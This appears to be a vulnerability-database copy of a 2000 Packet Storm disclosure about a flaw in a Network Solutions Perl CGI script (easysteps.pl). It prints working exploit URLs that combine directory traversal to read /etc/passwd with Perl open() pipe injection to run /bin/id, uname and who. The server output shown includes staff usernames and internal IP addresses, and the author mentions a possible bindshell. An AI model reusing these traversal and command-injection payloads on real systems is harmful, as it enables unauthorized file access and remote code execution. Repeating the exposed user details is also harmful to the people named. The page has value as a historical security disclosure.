Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

netsolbug.txt

🗓️ 09 May 2000 00:00:00Reported by vade79Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Major security bug in networksolutions.com allows unauthorized file access and execution.

Show more
Code
`networksolutions.com: www security hole. (may/9/2000)  
  
Major security issue with networksolutions.com(easysteps.pl). I was in   
#r00tabega, and someone relayed this(it was told to me Mr^Chaos found the  
orginal read bug):  
  
http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd  
  
And I so with that initial bug found, I downloaded the perl script with the bug  
itself. I noticed that a bigger problem existed:  
  
---  
  
open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";  
my @LINES = <CURR_FILE>;  
close(CURR_FILE);  
  
---  
  
$finalpath is for the most part supplied by the user. Knowning that open() can  
be used to execute programs, I used the initial bug for this, by going to   
the root dir and then accessing the file I wanted to execute followed by the  
pipe:  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|  
return: uid=60001(nobody) gid=60001(nobody)  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|  
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|  
return: "  
matthewh pts/1 Apr 17 11:32 (216.168.238.173)  
rholgado pts/2 Apr 17 15:35 (216.168.235.124)  
schauhan pts/3 May 4 16:05 (216.168.238.21)  
pvirador pts/4 Apr 20 17:02 (216.168.238.21)  
rholgado pts/5 Apr 18 13:39 (216.168.235.124)  
rholgado pts/6 Apr 18 13:40 (216.168.235.124)  
"  
  
I decided NOT to be retarded. But, I could have wrote a bindshell to a tmp  
directory and connected. While looking around the system I noticed some  
public exploits that would have been able to get me root.  
  
I just thought this was worth commenting on of a major corp, with  
such a obvious bug. (I don't want to goto jail, I don't know about you.)  
  
vade79[[email protected]] -> www.fakehalo.org  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
security issuenetwork solutionsfile accessunauthorized executionperl scriptroot access.
24
.json
Report